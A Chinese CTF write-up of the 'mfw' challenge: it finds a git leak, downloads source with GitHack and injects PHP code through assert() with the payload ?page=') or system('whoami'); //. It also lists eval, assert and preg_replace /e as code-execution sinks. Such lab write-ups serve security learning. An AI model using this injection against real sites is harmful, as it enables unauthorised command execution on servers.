当前位置:网站首页>攻防世界---mfw
攻防世界---mfw
2022-07-21 13:45:00 【jjj34】
知识点1:git泄露
知识点2:assert函数的命令执行漏洞
解题
步骤一
先进行目录扫描,发现git泄露
发现了git泄露,通过githack工具将其下载下来
进入dist文件中查看
一个一个查看后,发现了index.php里有漏洞利用点,即 assert函数
步骤二
assert函数的命令执行漏洞原理:当assert()内的参数为字符串是,那个字符串会被当成php函数执行(就和eval差不多)
注意到这两行代码
$file = "templates/" . $page . ".php";
assert(strops('$file','..') === false)
当page = ') //时
file = templates/')
assert中的代码为 strops('templates/') 因为语法问题直接报错了,但是可以通过 or 来进行命令执行
如 page = ') or system('whoami') //
file = templates/') or system('whoami')
assert中代码为 strops(templates/') or system('whoami')
因为 strops函数报错了,因此执行or后面的语句,即whoami
结合上面的思路构造pyaload
?page=') or system('whoami'); // 
需要注意的是,php语句结尾需要有分号
接下来就是正常的命令执行漏洞
补充
php函数中有命令执行漏洞的函数,最基本的原理就是括号内的参数会被当成php代码执行,然后可以通过 system()函数来执行命令行
1.eval() 最常见的
2.assert() 如果函数中嵌套了函数,可以采用or来进行绕过(如上面的strops函数)
3.preg_replace() ,/e模式具有命令执行的漏洞
边栏推荐
- 写了几段小代码,把系统给搞崩了,被老板爆怼一顿
- 2022.7.9 summer vacation personal training 1-b.how old are you Mr. string
- 基于SqlSugar的开发框架循序渐进介绍(12)-- 拆分页面模块内容为组件,实现分而治之的处理
- ES6 from introduction to mastery 01:es6 introduction
- 函数防抖与函数节流
- 2022.7.9 summer personal training 1-c Clean up the Powers that Be
- File operation in C language
- ES6 from getting started to mastering 02:let and const commands
- 92.(leaflet篇)leaflet态势标绘-进攻方向采集
- 华为机试-题目核心考点
猜你喜欢
数字孪生实际应用案例-智慧园区篇
ES6 from getting started to mastering 03: template string
China's mobile phones suffered a major setback for the first time, while Samsung and apple increased significantly
Performance area: the more you know, the more you don't know
How to clean the C disk
Simulink modeling and Simulation of parallel fuzzy PID compound controller
MLX90640 红外热成像传感器测温模块开发笔记(三)
Openlayers:点聚合效果
电脑是怎样上网的 (四) 局域网与服务器响应
模电——电阻是什么?
随机推荐
ES6 from introduction to mastery 01:es6 introduction
【微信公众号h5】授权
Tencent took out 38K two days ago, which showed me the basic ceiling. Today share is for you~
图神经网络:GAT学习、理解、入坑
Openai officially announced that dall-e will open its beta to 1million users
File operation in C language
pdf. JS how to Preview PDF files of Base64 type
Those violations in the store will be punished by the official secondary punishment, the most common four
The state Internet Information Office made a decision on the administrative punishment related to the network security review of didi Global Co., Ltd. in accordance with the law
Performance area: the more you know, the more you don't know
干货!高并发下秒杀商品,你必须知道的9个细节
Tensorflow入门教程(三十七)——DC-VNet
这还不硬?你来打我!手把手教学!
How much commission does CITIC Securities charge for opening an account?? Is it safe to open an account?
[JS foundation] use of random, floor and ceil methods in math
matlab-最小二乘法拟合
洛谷2089烧鸡
Virtual machine cannot connect to the Internet
yii2的加密解密那些事儿
前两天面了个腾讯拿 38K 出来的,让我见识到了基础的天花板,今天share给大家~